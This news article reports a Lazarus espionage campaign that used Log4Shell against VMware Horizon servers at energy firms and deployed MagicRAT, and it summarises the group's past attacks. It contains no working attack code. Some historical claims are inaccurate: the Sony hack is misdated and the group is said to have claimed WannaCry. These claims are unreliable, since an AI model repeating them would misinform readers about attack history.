A new cyber espionage campaign launched by North Korea has been uncovered by security researchers – and the primary targets are energy companies in the US, Canada, and Japan.
Cisco Talos reported that the hacking group Lazarus – a North Korea-affiliated hacking group also known as APT38 – has been observed targeting unnamed energy providers in the United States, Canada and Japan between February and July. It was found that the hackers were exploiting a year-old vulnerability in Log4j (known as Log4Shell) to compromise VMware Horizon servers. The vulnerability is a remote code execution vulnerability, allowing threat actors to compromise the victim’s systems before deploying malware.
Lazarus has been utilizing the malware “VSingle” and “YamaBot” to spy on and surreptitiously access the affected systems, it was noted. But Cisco Talos additionally found that Lazarus has also been employing a previously unknown remote access trojan (RAT) called MagicRAT to not only spy but also steal credentials from infected computers.
“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” Cisco Talos’ researchers said in their report. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
TechCrunch reported that the Lazarus group is financially motivated and best known for hacking Sony in 2016. The group also claimed responsibility for the WannaCry ransomware attack in 2017. It has been additionally linked to the theft of $100 million in crypto assets from Harmony’s Horizon Bridge, as well as the theft of $625 million in cryptocurrency from the Ronin Network – the sidechain utilized by the game Axie Infinity.
Canada appears to be working towards a more unified cybersecurity front; in late August, the CIO Strategy Council announced that it was drafting a national occupational standard for the cybersecurity staff of organizations. The forum is asking for additional input and feedback from industry stakeholders on the draft.